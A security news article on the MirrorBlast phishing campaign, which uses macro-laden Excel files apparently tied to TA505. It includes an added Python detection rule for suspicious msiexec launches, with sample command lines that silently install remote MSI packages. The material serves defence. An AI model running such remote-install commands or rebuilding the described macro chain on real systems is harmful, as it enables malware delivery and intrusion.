Researchers warn about a new phishing attack targeting employees in financial services, using a poisoned Excel file.
This Phishing Attack Uses An Infected Excel File That Can Avoid Detection
The MirrorBlast phishing campaign was first spotted by cybersecurity firm ET Labs in early September. Later, security firm Morphisec has examined the malware and warned that poisoned Excel files contain “extremely lightweight” embedded macros that could help them circumvent malware-detection systems.

Macros are scripts for automating tasks and have gained decent popularity among cybercrooks. While macros are disabled by default in Excel, the bad guys use social engineering tactics to trick targets into enabling them.
Macros’ efficiency is the reason why government-backed hacking groups have been using them. Earlier this year, Microsoft expanded its Antimalware Scan Interface (AMSI) for antivirus to combat the surge in macro malware and a new trend in which hackers use legacy Excel 4.0 XLM macros, instead of more recent VBA macros.
MirrorBlast – The Work Of Russian Hackers?
Morphisec pointed out that the attack chain resembles methods used by a known Russia-based hacking group tracked by researchers as TA505. The cybercriminal gang has been active since 2014 and is known to use a wide array of tools in their attacks.
“TA505 is most known for frequently changing the malware they use as well as driving global trends in malware distribution,” Morphisec researcher Arnold Osipov writes in a recent blog post.
“The attack chain of the infection bears a similarity to the tactics, techniques, and procedures commonly used by the allegedly Russia-based threat group TA505. The similarities extend to the attack chain, the GetandGo functionality, the final payload, and similarities in the domain name pattern”.
The attack starts with an Excel file attached to an email and then uses a Google feed proxy URL with a SharePoint and OneDrive bait that claims to be a file share request. By clicking the link, the target is redirected to a compromised SharePoint site or a fake OneDrive site. Both versions use that same weaponized Excel file.
Attackers Are Still Taking Advantage of the COVID-19 Context
The phishing email used in the campaign exploits the theme of company-issued COVID-related information regarding changes to working arrangements.
Researchers explained that the macro code could be executed only on a 32-bit version of Office because of compatibility issues with ActiveX objects. The macro bypasses sandboxing by executing JavaScript code that checks whether the computer is running in administrator mode. Then, it launches a process called msiexec.exe that downloads and installs an MSI package.
Morphisec discovered two versions of the MSI installer that exploited legitimate scripting tools KiXtart and REBOL.
The KiXtart script sends the victim’s computer information, such as the domain, computer name, user name, and process list, to the hacker’s command-and-control server. The server then responds with a number instructing whether or not to proceed with the REBOL script.
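The chain described above (an Office process launching msiexec.exe to fetch and install a remote MSI package) leaves a recognisable trace in endpoint process-creation telemetry. The following detection logic is an added example, not code from the article, Morphisec or ET Labs; it runs over constructed Sysmon-style process-creation events whose field names (EventID, Image, ParentImage, CommandLine, User) are an assumption about the log format, and the URLs and hostnames in the samples are made up.

```python
"""Flag msiexec.exe launches that fit the MirrorBlast-style chain:
an Office parent process and/or a remote (http/https) MSI package.
Sample events below are constructed, not real telemetry."""
import re

# Office binaries that should not normally be spawning the Windows Installer.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# "msiexec /i <url>" or "/package <url>" installs a package fetched over HTTP(S).
REMOTE_MSI = re.compile(r'(?:^|\s)/(?:i|package)\s+"?(https?://[^\s"]+)', re.IGNORECASE)
# Silent-install switches hide the installer UI from the user.
QUIET = re.compile(r"(?:^|\s)/(?:qn|quiet|q)\b", re.IGNORECASE)

# Constructed sample events (assumed Sysmon-like shape; EventID 1 = process create).
# Note: a 32-bit Office, which the article says the macro requires, resolves
# msiexec.exe to the SysWOW64 copy because of WOW64 file-system redirection.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\msiexec.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r"msiexec.exe /i https://example.invalid/update.msi /qn",
     "User": r"CORP\jdoe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\jdoe\Downloads\tool.msi"',
     "User": r"CORP\jdoe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\msiexec.exe /V",
     "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'msiexec /i "https://example.invalid/agent.msi" /quiet',
     "User": r"CORP\admin"},
]


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict):
    """Return a finding dict for a suspicious msiexec launch, else None."""
    if event.get("EventID") != 1 or _basename(event.get("Image", "")) != "msiexec.exe":
        return None
    parent = _basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    url = REMOTE_MSI.search(cmd)
    if parent in OFFICE_PARENTS:
        reasons.append(f"msiexec.exe spawned by Office process {parent}")
    if url:
        reasons.append(f"remote MSI package: {url.group(1)}")
    if not reasons:
        return None  # local package from a non-Office parent: ordinary installer use
    if QUIET.search(cmd):
        reasons.append("silent install flag present")
    # Both an Office parent and a remote package together match the described chain.
    severity = "high" if parent in OFFICE_PARENTS and url else "medium"
    return {"severity": severity, "user": event.get("User"), "command": cmd, "reasons": reasons}


def scan(events):
    """Run analyze_event over a sequence of events and collect the findings."""
    return [f for f in (analyze_event(e) for e in events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["user"], finding["command"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

The rule deliberately separates the two signals: an Office parent alone is worth a look even when the package path is local, and a remote package from a shell is worth a look even without Office in the chain; only the combination is rated high, which keeps routine software deployment through msiexec from paging anyone.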

Morphisec noted that the REBOL version leads to a widely used remote access tool called FlawedGrace.
“TA505 is one of many financially motivated threat groups currently active in the marketplace. They are also one of the most creative, as they have a tendency to constantly shift the attacks they leverage to achieve their goals,” Osipov notes.
Morphisec concluded by saying that attackers are increasingly focusing on evading detection, and more robust defenses are needed.
“The ability of the MirrorBlast attack to have very low detections in VirusTotal is also indicative of the focus most groups have on evading detection-centric solutions. Yet again, it is clear that the market’s reliance on detection and response leaves them open to more attacks than it resolves. A new way forward is needed”.
Sources:
ZDNet: This new phishing attack features a weaponized Excel file
Morphisec: Explosive New MirrorBlast Campaign Targets Financial Companies
Attribution:
Feature Image: Cards photo created by freepik – www.freepik.com